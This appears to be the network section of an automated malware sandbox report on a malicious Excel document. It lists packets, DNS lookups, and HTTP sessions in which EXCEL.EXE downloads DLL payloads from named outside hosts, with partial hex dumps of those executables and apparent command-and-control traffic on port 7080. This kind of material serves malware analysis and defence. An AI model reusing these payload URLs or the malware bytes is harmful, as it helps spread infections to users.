                                                                                                            Jul 17, 2022 13:13:35.901851892 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.901864052 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.901916981 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.901954889 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902085066 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902127028 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902168036 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902205944 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902283907 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902323961 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902359962 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902399063 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902482033 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902534962 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902611971 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902616024 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902650118 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.902926922 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902951956 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.902997017 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903011084 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903053999 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903065920 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903165102 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903263092 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903280020 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903304100 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903337955 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903374910 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903419018 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903428078 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903570890 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903616905 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903645992 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903740883 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903765917 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903810024 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.903892994 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.903937101 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904001951 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904041052 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904084921 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904135942 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904215097 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904261112 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904339075 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904378891 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904453039 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904504061 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904652119 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904714108 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904824018 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904879093 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.904898882 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904931068 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.904961109 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905111074 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905143023 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905144930 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905152082 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905194044 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905201912 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905249119 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905325890 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905369043 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905459881 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905505896 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905571938 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905615091 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905741930 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905791998 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905832052 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.905986071 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.905992985 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.906025887 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.906043053 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.906092882 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.906176090 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.906287909 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.906318903 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.906358004 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.906388998 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.906404018 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.906533957 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.906584024 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.906591892 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:35.906635046 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:35.909706116 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:13:40.706823111 CEST8049176196.22.142.203192.168.2.22
                                                                                                            Jul 17, 2022 13:13:40.706985950 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:14:11.436543941 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:11.538536072 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:11.538680077 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:11.664284945 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:11.770720959 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:11.787082911 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:11.787130117 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:11.787201881 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:11.800462961 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:11.905754089 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:11.905885935 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:14.888451099 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:15.029696941 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:15.569945097 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:15.570035934 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:18.574028969 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:18.574110985 CEST708049177174.138.33.49192.168.2.22
                                                                                                            Jul 17, 2022 13:14:18.574143887 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:18.574209929 CEST491777080192.168.2.22174.138.33.49
                                                                                                            Jul 17, 2022 13:14:37.984432936 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:14:37.984539032 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:14:49.375686884 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:14:49.375751019 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:14:49.444586992 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:14:49.859028101 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:14:50.826205015 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:14:52.760744095 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:14:56.598774910 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:15:04.274604082 CEST4917680192.168.2.22196.22.142.203
                                                                                                            Jul 17, 2022 13:15:19.657558918 CEST4917680192.168.2.22196.22.142.203

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jul 17, 2022 13:09:09.488004923 CEST5586853192.168.2.228.8.8.8
                                                                                                            Jul 17, 2022 13:09:09.520117998 CEST53558688.8.8.8192.168.2.22
                                                                                                            Jul 17, 2022 13:09:10.567666054 CEST4968853192.168.2.228.8.8.8
                                                                                                            Jul 17, 2022 13:09:10.597949028 CEST53496888.8.8.8192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.242024899 CEST5883653192.168.2.228.8.8.8
                                                                                                            Jul 17, 2022 13:13:32.264318943 CEST53588368.8.8.8192.168.2.22
                                                                                                            Jul 17, 2022 13:13:33.950267076 CEST5013453192.168.2.228.8.8.8
                                                                                                            Jul 17, 2022 13:13:34.161637068 CEST53501348.8.8.8192.168.2.22

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                            Jul 17, 2022 13:09:09.488004923 CEST192.168.2.228.8.8.80x43b4Standard query (0)atperson.comA (IP address)IN (0x0001)
                                                                                                            Jul 17, 2022 13:09:10.567666054 CEST192.168.2.228.8.8.80xe727Standard query (0)eliteturismo.comA (IP address)IN (0x0001)
                                                                                                            Jul 17, 2022 13:13:32.242024899 CEST192.168.2.228.8.8.80x6184Standard query (0)atici.netA (IP address)IN (0x0001)
                                                                                                            Jul 17, 2022 13:13:33.950267076 CEST192.168.2.228.8.8.80xe421Standard query (0)domesticuif.co.zaA (IP address)IN (0x0001)

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                            Jul 17, 2022 13:09:09.520117998 CEST8.8.8.8192.168.2.220x43b4No error (0)atperson.com51.38.169.114A (IP address)IN (0x0001)
                                                                                                            Jul 17, 2022 13:09:10.597949028 CEST8.8.8.8192.168.2.220xe727No error (0)eliteturismo.com44.194.33.146A (IP address)IN (0x0001)
                                                                                                            Jul 17, 2022 13:13:32.264318943 CEST8.8.8.8192.168.2.220x6184No error (0)atici.net185.15.196.157A (IP address)IN (0x0001)
                                                                                                            Jul 17, 2022 13:13:34.161637068 CEST8.8.8.8192.168.2.220xe421No error (0)domesticuif.co.za196.22.142.203A (IP address)IN (0x0001)

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • atperson.com
                                                                                                            • atici.net
                                                                                                            • domesticuif.co.za

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            0192.168.2.224917151.38.169.114443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            1192.168.2.2249175185.15.196.15780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            Jul 17, 2022 13:13:32.336560965 CEST17OUTGET /c/JDFDBMIz/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: atici.net
                                                                                                            Connection: Keep-Alive
                                                                                                            Jul 17, 2022 13:13:32.416630983 CEST18INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Sun, 17 Jul 2022 11:13:21 GMT
                                                                                                            Content-Type: application/x-msdownload
                                                                                                            Content-Length: 850944
                                                                                                            Connection: keep-alive
                                                                                                            X-Powered-By: PHP/7.3.33
                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Sun, 17 Jul 2022 11:13:21 GMT
                                                                                                            Content-Disposition: attachment; filename="8WkzZvRZPr2gVDdMW.dll"
                                                                                                            Content-Transfer-Encoding: binary
                                                                                                            Set-Cookie: 62d3eed1483a4=1658056401; expires=Sun, 17-Jul-2022 11:14:21 GMT; Max-Age=60; path=/
                                                                                                            Last-Modified: Sun, 17 Jul 2022 11:13:21 GMT
                                                                                                            X-Powered-By: PleskLin
                                                                                                            Data Raw: 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6a 73 2e 63 6f 66 6f 75 6e 64 65 72 73 70 65 63 69 61 6c 73 2e 63 6f 6d 2f 73 70 6c 61 73 68 2e 6a 73 3f 76 3d 31 2e 31 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 3c 2f 73 63 72 69 70 74 3e 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 fc 1a 64 a4 9d 74 37 a4 9d 74 37 a4 9d 74 37 77 ef 77 36 a2 9d 74 37 77 ef 71 36 21 9d 74 37 77 ef 70 36 ae 9d 74 37 f6 e8 71 36 87 9d 74 37 f6 e8 70 36 aa 9d 74 37 f6 e8 77 36 ad 9d 74 37 77 ef 75 36 ad 9d 74 37 a4 9d 75 37 c7 9d 74 37 65 e8 71 36 a6 9d 74 37 65 e8 74 36 a5 9d 74 37 65 e8 8b 37 a5 9d 74 37 a4 9d e3 37 a6 9d 74 37 65 e8 76 36 a5 9d 74 37 52 69 63 68 a4 9d 74 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 29 76 cc 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 b6 05 00 00 5c 07 00 00 00 00 00 54 2c 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0d 00 00 04 00 00 00 00 00 00 02 00 20 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 ee 06 00 14 04 00 00 c4 f2 06 00 64 00 00 00 00 90 07 00 20 b0 05 00 00 30 07 00 38 46 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 0c 08 00 00 c0 87 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 87 06 00 38 01 00 00 00 00 00 00 00 00 00 00 00 d0 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 b4 05 00 00 10 00 00 00 b6 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 2d 01 00 00 d0 05 00 00 2e 01 00 00 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 27 00 00 00 00 07 00 00 0e 00 00 00 e8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 38 46 00 00 00 30 07 00 00 48 00 00 00 f6 06 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: <script src='https://js.cofounderspecials.com/splash.js?v=1.1.1' type='text/javascript'></script>MZ@!L!This program cannot be run in DOS mode.$dt7t7t7ww6t7wq6!t7wp6t7q6t7p6t7w6t7wu6t7u7t7eq6t7et6t7e7t77t7ev6t7Richt7PEd)vb" \T,` d 08FP88.text `.rdata-.@@.data@'@.pdata8F0H
                                                                                                            Jul 17, 2022 13:13:32.416704893 CEST19INData Raw: 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 80 07 00 00 02 00 00 00 3e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 20 b0 05 00 00 90 07 00 00 b2 05 00 00 40 07 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: @@_RDATA>@@.rsrc @@@.relocP@B
                                                                                                            Jul 17, 2022 13:13:32.416749954 CEST21INData Raw: 48 8b c2 48 2b ca 48 f7 d8 48 8b c2 4d 1b c0 4c 23 c1 48 f7 d8 1b c0 f7 d0 25 57 00 07 80 48 85 d2 74 5e 49 8b c9 4b 8d 14 42 49 2b c8 74 31 4d 2b c1 48 8d 81 fe ff ff 7f 49 03 c0 4c 2b da 48 85 c0 74 1c 45 0f b7 04 13 66 45 85 c0 74 11 66 44 89
                                                                                                            Data Ascii: HH+HHML#H%WHt^IKBI+t1M+HIL+HtEfEtfDHHHuHHBHEHf%zWH\$LD$LL$ SUVWAVAWH8HB3ILH=vWHtXfSL$HrL|$(LLH\$ IHH]
                                                                                                            Jul 17, 2022 13:13:32.416774988 CEST22INData Raw: 48 8b 57 10 48 8b 8c 24 90 00 00 00 44 8b c3 89 5f 08 e8 d2 fb ff ff 48 8b 46 20 48 89 07 ff 46 14 01 5e 18 33 c0 48 89 7e 20 eb 0c b8 05 40 00 80 eb 05 b8 03 40 00 80 48 8b 5c 24 78 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 b8 01 40 00 80
                                                                                                            Data Ascii: HWH$D_HF HF^3H~ @@H\$xH0A_A^A]A\_^]@3@H\$Ht$WH HHHt8Ht3cHHu3AH,H33H@H\$0Ht$8H _H\$WH HHHu@>HHt-
                                                                                                            Jul 17, 2022 13:13:32.416799068 CEST23INData Raw: 06 00 00 0f 85 3d 01 00 00 48 8b 15 fb e1 06 00 48 c7 c1 02 00 00 80 ff 15 86 b1 05 00 48 8b 15 e7 e1 06 00 48 8d 44 24 58 48 89 44 24 40 45 33 c9 48 8d 44 24 50 45 33 c0 48 89 44 24 38 48 c7 c1 02 00 00 80 48 83 64 24 30 00 c7 44 24 28 06 00 02
                                                                                                            Data Ascii: =HHHHD$XHD$@E3HD$PE3HD$8HHd$0D$(d$ MtHL$PFHHAZH{AHL$PD$(E3HHD$ uHHT$`|HL$PxH8HE$D$(A
                                                                                                            Jul 17, 2022 13:13:32.416824102 CEST25INData Raw: d8 44 8b f8 48 85 c9 0f 84 b5 02 00 00 48 85 d2 0f 84 ac 02 00 00 44 8b 49 14 45 85 c9 75 07 89 02 e9 98 02 00 00 48 39 41 20 75 07 bb 05 40 00 80 eb ec 8b 46 18 4c 8d 05 24 b2 05 00 48 83 c1 28 89 44 24 20 ba c8 00 00 00 e8 8a f0 ff ff 45 33 c9
                                                                                                            Data Ascii: DHHDIEuH9A u@FL$H(D$ E3y@D[HFH;DpDhDt$0Dl$4E EEDD3AA;rAA3LHu@L3I/"HN 3HthDLI9ivKL
                                                                                                            Jul 17, 2022 13:13:32.416837931 CEST25INData Raw: 03 c8 4c 33 ca 49 8b c9 5b e9 11 00 00 00 cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 3b 0d a1 d7 06 00 75 10 48 c1 c1 10 66 f7 c1 ff ff 75 01 c3 48 c1 c9 10 e9 3a 06 00 00 cc cc 48 83 ec 28 85 d2 74 39 83 ea 01 74 28 83 ea 01 74 16 83
                                                                                                            Data Ascii: L3I[ffH;uHfuH:H(t9t(ttH(6H(IH(MH(H\$Ht$H|$ AVH HL3-
                                                                                                            Jul 17, 2022 13:13:32.416861057 CEST26INData Raw: 88 44 24 40 40 b7 01 83 3d e9 e8 06 00 00 0f 85 c5 00 00 00 c7 05 d9 e8 06 00 01 00 00 00 e8 78 0b 00 00 84 c0 74 4f e8 07 11 00 00 e8 16 0a 00 00 e8 35 0a 00 00 48 8d 15 c2 a9 05 00 48 8d 0d 9b a9 05 00 e8 66 73 03 00 85 c0 75 29 e8 15 0b 00 00
                                                                                                            Data Ascii: D$@@=xtO5HHfsu)t HzHks@2@u?DHH8t$HtLIHLA3H\$0Ht$8H|$HH A^H\$WH0@
                                                                                                            Jul 17, 2022 13:13:32.416887045 CEST28INData Raw: 06 00 48 8d 4c 24 20 e8 81 1c 00 00 cc 48 83 ec 48 48 8d 4c 24 20 e8 5e fe ff ff 48 8d 15 f3 be 06 00 48 8d 4c 24 20 e8 61 1c 00 00 cc 48 83 79 08 00 48 8d 05 5c b3 05 00 48 0f 45 41 08 c3 cc cc e9 77 6e 03 00 cc cc cc 40 53 48 83 ec 20 48 8b d9
                                                                                                            Data Ascii: HL$ HHHL$ ^HHL$ aHyH\HEAwn@SH H3Hr4HH [H%hHL$H8\t)H2HD$8HHD$8HHHHsHD$@HwMG
                                                                                                            Jul 17, 2022 13:13:32.417085886 CEST29INData Raw: 48 83 08 24 e8 e6 ff ff ff 48 83 08 02 48 83 c4 28 c3 cc 48 83 ec 28 e8 ab 0a 00 00 8b c8 48 83 c4 28 e9 88 78 03 00 4c 63 41 3c 41 0f b7 44 08 14 4d 8d 0c 08 48 83 c0 18 4c 03 c8 41 0f b7 44 08 06 48 8d 0c 80 4d 8d 04 c9 4d 3b c8 74 1e 41 8b 49
                                                                                                            Data Ascii: H$HH(H(H(xLcA<ADMHLADHMM;tAIH;rAAH;rI(I3kHt'MZf9uHcA<H8PEuf9Hu2eH%0H(t!eH%0HHH;t3Hu2H(
                                                                                                            Jul 17, 2022 13:13:32.486805916 CEST31INData Raw: 88 00 00 00 e8 58 0d 00 00 48 8b 85 c8 04 00 00 48 89 44 24 60 c7 44 24 50 15 00 00 40 c7 44 24 54 01 00 00 00 ff 15 7e 97 05 00 83 f8 01 48 8d 44 24 50 48 89 44 24 40 48 8d 45 f0 0f 94 c3 48 89 44 24 48 33 c9 ff 15 1d 97 05 00 48 8d 4c 24 40 ff
                                                                                                            Data Ascii: XHHD$`D$P@D$T~HD$PHD$@HEHD$H3HL$@uuHH$H]H3HL$ DBhHL$ D$\fED$`Hk3H(3Ht:MZf9u0HcH<H9PEu!f9A


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            2192.168.2.2249176196.22.142.20380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            Jul 17, 2022 13:13:34.355343103 CEST913OUTGET /libraries/nbnH9dpd/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: domesticuif.co.za
                                                                                                            Connection: Keep-Alive
                                                                                                            Jul 17, 2022 13:13:34.559056044 CEST914INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 17 Jul 2022 11:13:34 GMT
                                                                                                            Server: Apache
                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Sun, 17 Jul 2022 11:13:34 GMT
                                                                                                            Content-Disposition: attachment; filename="I7IggNeBzEXeF5.dll"
                                                                                                            Content-Transfer-Encoding: binary
                                                                                                            Set-Cookie: 62d3eede6f19e=1658056414; expires=Sun, 17-Jul-2022 11:14:34 GMT; Max-Age=60; path=/
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Upgrade: h2,h2c
                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                            Last-Modified: Sun, 17 Jul 2022 11:13:34 GMT
                                                                                                            Content-Length: 850944
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Content-Type: application/x-msdownload
                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 fc 1a 64 a4 9d 74 37 a4 9d 74 37 a4 9d 74 37 77 ef 77 36 a2 9d 74 37 77 ef 71 36 21 9d 74 37 77 ef 70 36 ae 9d 74 37 f6 e8 71 36 87 9d 74 37 f6 e8 70 36 aa 9d 74 37 f6 e8 77 36 ad 9d 74 37 77 ef 75 36 ad 9d 74 37 a4 9d 75 37 c7 9d 74 37 65 e8 71 36 a6 9d 74 37 65 e8 74 36 a5 9d 74 37 65 e8 8b 37 a5 9d 74 37 a4 9d e3 37 a6 9d 74 37 65 e8 76 36 a5 9d 74 37 52 69 63 68 a4 9d 74 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 29 76 cc 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 b6 05 00 00 5c 07 00 00 00 00 00 54 2c 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0d 00 00 04 00 00 00 00 00 00 02 00 20 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 ee 06 00 14 04 00 00 c4 f2 06 00 64 00 00 00 00 90 07 00 20 b0 05 00 00 30 07 00 38 46 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 0c 08 00 00 c0 87 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 87 06 00 38 01 00 00 00 